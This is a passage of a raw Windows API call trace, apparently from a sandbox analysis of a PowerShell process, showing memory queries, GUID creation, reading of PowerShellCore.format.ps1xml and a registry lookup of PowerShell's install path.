	[0286.512] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.512] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.513] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.514] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x2ecd6794, Data2=0xf20d, Data3=0x440b, Data4=([0]=0xaa, [1]=0xbe, [2]=0x61, [3]=0x6f, [4]=0x3a, [5]=0x71, [6]=0xe0, [7]=0xa0))) returned 0x0
	[0286.514] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.515] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b400, lpBuffer=0x20c2c0, dwLength=0x30 | out: lpBuffer=0x20c2c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.516] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x494061e6, Data2=0x281b, Data3=0x4ed3, Data4=([0]=0x91, [1]=0x7b, [2]=0x96, [3]=0x77, [4]=0x9, [5]=0xa6, [6]=0x8b, [7]=0x75))) returned 0x0
	[0286.516] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x5630724, Data2=0xa89a, Data3=0x4a09, Data4=([0]=0x9f, [1]=0x24, [2]=0x4f, [3]=0x7d, [4]=0x2f, [5]=0x3a, [6]=0xad, [7]=0x7a))) returned 0x0
	[0286.517] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xbac5a5e5, Data2=0x7161, Data3=0x44c8, Data4=([0]=0xa6, [1]=0x24, [2]=0xca, [3]=0xb2, [4]=0xf3, [5]=0x73, [6]=0x53, [7]=0x5b))) returned 0x0
	[0286.517] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xfeeaaeb5, Data2=0xb815, Data3=0x4f60, Data4=([0]=0x83, [1]=0x5f, [2]=0x7b, [3]=0x24, [4]=0x90, [5]=0xe9, [6]=0x63, [7]=0xd3))) returned 0x0
	[0286.518] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x6d154507, Data2=0x781c, Data3=0x4b38, Data4=([0]=0xb4, [1]=0xb8, [2]=0xc2, [3]=0x5b, [4]=0xe8, [5]=0x9c, [6]=0x65, [7]=0x19))) returned 0x0
	[0286.518] VirtualQuery (in: lpAddress=0x20b510, lpBuffer=0x20c3d0, dwLength=0x30 | out: lpBuffer=0x20c3d0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.518] VirtualQuery (in: lpAddress=0x20b5a0, lpBuffer=0x20c460, dwLength=0x30 | out: lpBuffer=0x20c460*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.518] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe3cd8866, Data2=0x5dad, Data3=0x4fff, Data4=([0]=0x88, [1]=0xec, [2]=0xaf, [3]=0xf6, [4]=0x76, [5]=0xc2, [6]=0x9, [7]=0x18))) returned 0x0
	[0286.518] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x2f711156, Data2=0x574c, Data3=0x4af1, Data4=([0]=0x9b, [1]=0x4a, [2]=0x4e, [3]=0x9b, [4]=0xfa, [5]=0x1e, [6]=0x8d, [7]=0x13))) returned 0x0
	[0286.518] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x939e5c0d, Data2=0x392f, Data3=0x410d, Data4=([0]=0x9d, [1]=0x45, [2]=0xab, [3]=0x0, [4]=0x43, [5]=0x91, [6]=0xd7, [7]=0xc3))) returned 0x0
	[0286.519] SetErrorMode (uMode=0x1) returned 0x1
	[0286.519] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0286.519] GetFileType (hFile=0x1c4) returned 0x1
	[0286.519] SetErrorMode (uMode=0x1) returned 0x1
	[0286.519] GetFileType (hFile=0x1c4) returned 0x1
	[0286.519] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.519] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.519] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.519] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.520] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0xe67, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2fa9ff7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2fa9ff7*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.522] ReadFile (in: hFile=0x1c4, lpBuffer=0x2faaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2faaa28*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0286.523] SetErrorMode (uMode=0x1) returned 0x1
	[0286.523] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0286.523] SetErrorMode (uMode=0x1) returned 0x1
	[0286.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.523] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1c4) returned 0x0
	[0286.523] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0286.523] CoTaskMemAlloc (cb=0x5a) returned 0x4b1970
	[0286.523] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x4b1970, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0286.523] CoTaskMemFree (pv=0x4b1970) 
	[0286.523] RegCloseKey (hKey=0x1c4) returned 0x0
	[0286.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.525] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x757f7503, Data2=0x3b5b, Data3=0x4590, Data4=([0]=0x9c, [1]=0x6b, [2]=0x27, [3]=0x32, [4]=0x1d, [5]=0x0, [6]=0x43, [7]=0xd7))) returned 0x0
	[0286.525] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xda1ffe9, Data2=0x96c7, Data3=0x4b9b, Data4=([0]=0xa7, [1]=0x1d, [2]=0xbf, [3]=0xb8, [4]=0xf4, [5]=0x8b, [6]=0x15, [7]=0x19))) returned 0x0
	[0286.525] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd4ce6df3, Data2=0x6790, Data3=0x43a5, Data4=([0]=0x82, [1]=0xb6, [2]=0x67, [3]=0x17, [4]=0xa6, [5]=0x69, [6]=0xcf, [7]=0x51))) returned 0x0
	[0286.525] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa1e492fb, Data2=0x1b9d, Data3=0x4722, Data4=([0]=0x87, [1]=0x95, [2]=0x82, [3]=0xcd, [4]=0x6d, [5]=0xed, [6]=0x5d, [7]=0x6))) returned 0x0
	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb3a2603e, Data2=0x9d59, Data3=0x4bdf, Data4=([0]=0x87, [1]=0x7b, [2]=0x4a, [3]=0xd1, [4]=0x53, [5]=0x5d, [6]=0x25, [7]=0x6c))) returned 0x0
	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x1e2a9f34, Data2=0x5a1e, Data3=0x4ce0, Data4=([0]=0xbf, [1]=0x31, [2]=0x46, [3]=0xe0, [4]=0x84, [5]=0xed, [6]=0x35, [7]=0xf7))) returned 0x0
	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x356c3bf7, Data2=0x1a19, Data3=0x4956, Data4=([0]=0xb5, [1]=0x4, [2]=0x49, [3]=0xcd, [4]=0x4c, [5]=0x4f, [6]=0x79, [7]=0xae))) returned 0x0
	[0286.526] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x19c240f8, Data2=0x5788, Data3=0x43ea, Data4=([0]=0x9e, [1]=0x1e, [2]=0x14, [3]=0x2c, [4]=0x5b, [5]=0x8, [6]=0x2, [7]=0x9a))) returned 0x0
	[0286.526] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x5163fa5e, Data2=0x35c9, Data3=0x4f81, Data4=([0]=0x98, [1]=0xc7, [2]=0xcc, [3]=0xf6, [4]=0x9d, [5]=0xa2, [6]=0x36, [7]=0x6a))) returned 0x0
